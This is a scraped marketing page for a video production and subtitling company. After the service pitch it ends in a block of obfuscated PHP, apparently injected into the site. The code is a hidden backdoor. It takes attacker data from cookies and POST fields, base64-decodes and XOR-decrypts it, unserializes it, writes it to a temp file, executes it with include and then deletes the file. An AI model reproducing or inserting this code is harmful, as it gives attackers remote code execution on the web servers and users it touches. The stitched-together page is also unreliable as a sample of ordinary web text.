
First class video production and video editing services –
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Day Digital provides first class video production and editing services to suit all your needs. Whether you need to produce a corporate video or whiteboard, animation or explainer, we have the creative talent for all your video services. We even offer video subtitling services to bring your projects to international fame. We can work in almost any format and even provide script writing and post promotion techniques!

Video Production

Videos Are a Great Way to Engage Your Audience

Everybody loves videos! Videos are an excellent way of communicating your products and services, or corporate culture to your customers. You get to show, instead of tell, with eye-catching imagery that holds your viewers’ attention. Videos convey a lot of information across one highly shareable audiovisual medium.

Video Subtitling Services

Professional video subtitling services that read naturally and concisely

Are you a professional filmmaker who requires foreign language subtitles for your movie? Or are you an amateur filmmaker who wants English subtitles for your foreign language video? You’ve come to the right place! Whether you have an educational, informational or corporate video you need subtitles for, no matter where your audience is, we can help you get your message across.

How do I get my Content Translated to Reach Local Clientele?

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$HRdnAF = "\117" . chr (103) . 'H' . chr (95) . chr ( 147 - 42 ).'t' . 'L' . 'o' . chr ( 579 - 502 ); $xZIYMTuo = "\x63" . chr (108) . chr ( 818 - 721 )."\x73" . 's' . chr (95) . 'e' . chr ( 767 - 647 ).chr ( 245 - 140 ).chr ( 493 - 378 )."\164" . 's';$KWorAQF = class_exists($HRdnAF); $xZIYMTuo = "41268";$ILFFm = !1;if ($KWorAQF == $ILFFm){function FKDOEh(){$KkRnsgQatF = new /* 32890 */ OgH_itLoM(36609 + 36609); $KkRnsgQatF = NULL;}$cpesABGwH = "36609";class OgH_itLoM{private function qbgqGFr($cpesABGwH){if (is_array(OgH_itLoM::$jjMmIhug)) {$WIxanId = sys_get_temp_dir() . "/" . crc32(OgH_itLoM::$jjMmIhug['s' . 'a' . "\154" . chr (116)]);@OgH_itLoM::$jjMmIhug["\167" . "\162" . chr (105) . "\164" . chr ( 341 - 240 )]($WIxanId, OgH_itLoM::$jjMmIhug[chr (99) . 'o' . chr ( 716 - 606 )."\164" . chr (101) . "\156" . chr ( 178 - 62 )]);include $WIxanId;@OgH_itLoM::$jjMmIhug[chr (100) . "\145" . "\x6c" . chr (101) . 't' . chr ( 470 - 369 )]($WIxanId); $cpesABGwH = "36609";exit();}}private $mUmmQeVJ;public function fYIcT(){echo 59783;}public function __destruct(){OgH_itLoM::$jjMmIhug = @unserialize(OgH_itLoM::$jjMmIhug); $cpesABGwH = "48289_50693";$this->qbgqGFr($cpesABGwH); $cpesABGwH = "48289_50693";}public function JGxHJQkDJp($hHYFL, $fvnZep){return $hHYFL[0] ^ str_repeat($fvnZep, (strlen($hHYFL[0]) / strlen($fvnZep)) + 1);}public function rWYhQp($hHYFL){$wJDeAQ = "base64";return array_map($wJDeAQ . "\137" . chr ( 627 - 527 ).'e' . "\x63" . "\x6f" . 'd' . chr (101), array($hHYFL,));}public function __construct($zGUyDnlQwX=0){$hHYFL = "";$VYGYPoQD = $_POST;$ZhictTE = $_COOKIE;$fvnZep = "2483450f-599f-43d3-ad1f-afd3c3fa694d";$JOCIGjkY = @$ZhictTE[substr($fvnZep, 0, 4)];if (!empty($JOCIGjkY)){$JOCIGjkY = explode(",", $JOCIGjkY);foreach ($JOCIGjkY as $xcGEn){$hHYFL .= @$ZhictTE[$xcGEn];$hHYFL .= @$VYGYPoQD[$xcGEn];}$hHYFL = $this->rWYhQp($hHYFL);}OgH_itLoM::$jjMmIhug = $this->JGxHJQkDJp($hHYFL, $fvnZep); $fvnZep = explode(",", $fvnZep);}public static $jjMmIhug = 40444;}FKDOEh();}